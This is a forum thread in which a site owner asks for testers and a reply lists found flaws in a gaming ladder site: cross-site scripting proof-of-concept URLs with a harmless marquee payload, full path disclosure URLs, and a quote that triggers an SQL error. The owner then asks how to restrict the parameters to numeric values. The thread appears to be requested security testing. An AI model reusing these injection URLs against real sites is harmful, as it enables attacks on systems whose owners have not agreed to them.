Jump to content

Just Finished! Need Testers.


Zepo.

Recommended Posts

Array:

http://www.cashladders.com/ladders/king.php?ladder[]

 

Cross Site Scripting:

http://www.cashladders.com/ladders/challenge.php?login[cid]='><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.cashladders.com/ladders/challenge.php?login[id]='><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.cashladders.com/ladders/challengedb.php?chall[ladderid]='><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.cashladders.com/ladders/join.php?action=jointourney&login[id]='><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.cashladders.com/ladders/king.php?ladder='><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.cashladders.com/ladders/report.php?login[wid]='><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.cashladders.com/ladders/standings.php?ladder[id]=1&ladder[rank]=1&ladder[unranked]='><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://www.cashladders.com/ladders/matchdb.php?matchdb[ladderid]='><marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

There is Cross Site Scripting if the War Details contain </textarea>code.

 

Cross Site Scripting:

There is Cross Site Scripting if your username contains '>code.

 

Cross Site Scripting:

There is Cross Site Scripting when you register if the fields contain 'code.

 

Drop Down Menu:

If you edit the Timezone drop down menu you can set it to arbitrary values.

 

Full Path Disclosure:

http://www.cashladders.com/ladders/admin_3strikes.php

 

Full Path Disclosure:

http://www.cashladders.com/ladders/admin_3strikes_add.php

 

Full Path Disclosure:

http://www.cashladders.com/ladders/admin_report_db.php

 

Full Path Disclosure:

http://www.cashladders.com/ladders/challengedb.php?chall[start][]

 

Full Path Disclosure:

http://www.cashladders.com/ladders/html.php

 

Full Path Disclosure:

http://www.cashladders.com/ladders/king.php?matchdb[start][]

 

Full Path Disclosure:

http://www.cashladders.com/ladders/level.php

 

Full Path Disclosure:

http://www.cashladders.com/ladders/matchdb.php?matchdb[start][]

 

Full Path Disclosure:

http://www.cashladders.com/ladders/news_inc.php

 

Full Path Disclosure:

http://www.cashladders.com/ladders/ranks_inc.php

 

Full Path Disclosure:

http://www.cashladders.com/ladders/report_inc_db.php

 

Full Path Disclosure:

http://www.cashladders.com/ladders/strikes_main.php

 

SQL Error:

http://www.cashladders.com/ladders/king.php?matchdb[start]='

Error in result_king
Link to comment
Share on other sites

You think you could perhaps look a little longer before posting instead of posting 11 in a row in less than an hour? It can't be that hard to open notepad or something and write it in, then paste it in the post box when you think you're done.

 

 

 

In apply.php it says:

%nbsp;Email:
Link to comment
Share on other sites

Wow it looks like imma be patching a lot of XSS's lol. I'll get to work. So almost all of these i just gotta make it allow only numeric values right?

 

Is this the code?

if ($login[id] && !is_numeric($login[id])) {
error("You have specified an Invalid Login ID!"); }

 

If it is how would i apply it to more then just $login[id]?

Link to comment
Share on other sites

How did you get 4 posts?

 

One of the admins probably dropped it to zero because he keeps posting a lot of posts in a row like that. To me it would seem like he is just trying to up his post count, the admin probably thought the same.

Link to comment
Share on other sites

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.